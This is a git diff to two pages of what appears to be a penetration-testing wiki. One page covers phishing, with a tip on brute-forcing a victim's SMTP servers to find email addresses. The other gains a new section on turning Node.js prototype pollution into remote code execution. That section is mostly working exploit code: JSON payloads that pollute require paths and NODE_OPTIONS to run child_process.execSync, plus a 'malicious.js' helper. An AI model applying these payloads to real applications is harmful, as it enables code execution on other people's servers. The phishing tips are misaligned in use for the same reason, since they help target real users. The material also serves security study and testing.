diff --git a/generic-methodologies-and-resources/phishing-methodology/README.md b/generic-methodologies-and-resources/phishing-methodology/README.md index adcf52c5..ae841e73 100644 --- a/generic-methodologies-and-resources/phishing-methodology/README.md +++ b/generic-methodologies-and-resources/phishing-methodology/README.md @@ -87,7 +87,7 @@ In order to make sure that the expired domain that you are going to buy **has al * [https://hunter.io/](https://hunter.io) * [https://anymailfinder.com/](https://anymailfinder.com) -In order to **discover more** valid email addresses or **verify the ones** you have already discovered you can check if you can brute-force them smtp servers of the victim. [Learn how to verify/discover email address here](../../network-services-pentesting/pentesting-smtp/#username-bruteforce-enumeration).\ +In order to **discover more** valid email addresses or **verify the ones** you have already discovered you can check if you can brute-force them smtp servers of the victim. [Learn how to verify/discover email address here](../../phishing-methodology/broken-reference/).\ Moreover, don't forget that if the users use **any web portal to access their mails**, you can check if it's vulnerable to **username brute force**, and exploit the vulnerability if possible. ## Configuring GoPhish diff --git a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md index 790e1a2a..599a8c72 100644 --- a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md +++ b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md @@ -159,8 +159,118 @@ var proc = fork('a_file.js'); ## Forcing Spawn -In the previous examples you saw how to trigger the gadget a functionality that **calls `spawn`** needs to be **present** (all methods of **`child_process`** used to execute something calls it). In the previous example that was **part of the the code**, but what if the code **isn't** calling it.\ -In this [**other writeup**](https://blog.sonarsource.com/blitzjs-prototype-pollution/) the user can control the file path were a **`require`** will be executed. In that scenario the attacker just needs to **find a `.js` file inside the system** that will **execute an spawn method when imported**. +In the previous examples you saw how to trigger the gadget a functionality that **calls `spawn`** needs to be **present** (all methods of **`child_process`** used to execute something calls it). In the previous example that was **part of the the code**, but what if the code **isn't** calling it. + +### Controlling a require file path + +In this [**other writeup**](https://blog.sonarsource.com/blitzjs-prototype-pollution/) the user can control the file path were a **`require`** will be executed. In that scenario the attacker just needs to **find a `.js` file inside the system** that will **execute an spawn method when imported.**\ +****Some examples of common files calling a spawn function when imported are: + +* /path/to/npm/scripts/changelog.js +* /opt/yarn-v1.22.19/preinstall.js + +### Setting require file path via prototype pollution + +{% hint style="warning" %} +The **previous technique requires** that the **user controls the path of the file** that is going to be **required**. But this is not always true. +{% endhint %} + +However, if the code is going to execute a require after the prototype pollution, even if you **don't control the path** that is going to be require and this **path is relative**, you **can force a different one abusing propotype pollution**. So even if the code line is like `require("./a_file.js")` it will **required the package you set**. + +Therefore, if a require is executed after your prototype pollution and no spawn function, this is the attack: + +* Find a **`.js` file inside the system** that when **required** will **execute something using `child_process`** + * If you can upload files to the platform you are attacking you might upload a file like that +* Pollute the paths to **force the require load of the `.js` file** that will execute something with child\_process +* **Pollute the environ/cmdline** to execute arbitrary code when a child\_process execution function is called (see the initial techniques) + +#### Method 1 to set arbitrary require + +{% tabs %} +{% tab title="exploit" %} +{% code overflow="wrap" %} +```javascript +// Create a file called malicious.js in /tmp +// Contents of malicious.js in the other tab + +// Manual Pollution +b = {} +b.__proto__.exports = { ".": "./malicious.js" } +b.__proto__["1"] = "/tmp" + +// Trigger gadget +var proc = require('./relative_path.js'); +// This should execute the file /tmp/malicious.js +// The relative path doesn't even need to exist + + +// Abusing the vulnerable code +USERINPUT = JSON.parse('{"__proto__": {"exports": {".": "./malicious.js"}, "1": "/tmp", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce2\\\").toString())//"}}') + +clone(USERINPUT); + +var proc = require('./relative_path.js'); +// This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec +``` +{% endcode %} +{% endtab %} + +{% tab title="malicious.js" %} +```javascript +const { fork } = require('child_process'); +console.log("Hellooo from malicious"); +fork('/path/to/anything'); +``` +{% endtab %} +{% endtabs %} + +#### Method 2 to set arbitrary require + +{% tabs %} +{% tab title="exploit" %} +{% code overflow="wrap" %} +```javascript +// Create a file called malicious.js in /tmp +// Contents of malicious.js in the other tab + +// Manual Pollution +b = {} +b.__proto__.data = {} +b.__proto__.data.exports = { ".": "./malicious.js" } +b.__proto__.path = "/tmp" +b.__proto__.name = "./relative_path2.js" //This needs to be the relative path that will be imported in the require + +// Trigger gadget +var proc = require('./relative_path.js'); +// This should execute the file /tmp/malicious.js +// The relative path doesn't even need to exist + + +// Abusing the vulnerable code +USERINPUT = JSON.parse('{"__proto__": {"data": {"exports": {".": "./malicious.js"}}, "path": "/tmp", "name": "./relative_path.js", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce2\\\").toString())//"}}') + +clone(USERINPUT); + +var proc = require('./relative_path.js'); +// This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec +``` +{% endcode %} +{% endtab %} + +{% tab title="malicious.js" %} +```javascript +const { fork } = require('child_process'); +console.log("Hellooo from malicious"); +fork('/path/to/anything'); +``` +{% endtab %} +{% endtabs %} + +## References + +* [https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/) +* [https://blog.sonarsource.com/blitzjs-prototype-pollution/](https://blog.sonarsource.com/blitzjs-prototype-pollution/) +* [https://arxiv.org/pdf/2207.11171.pdf](https://arxiv.org/pdf/2207.11171.pdf)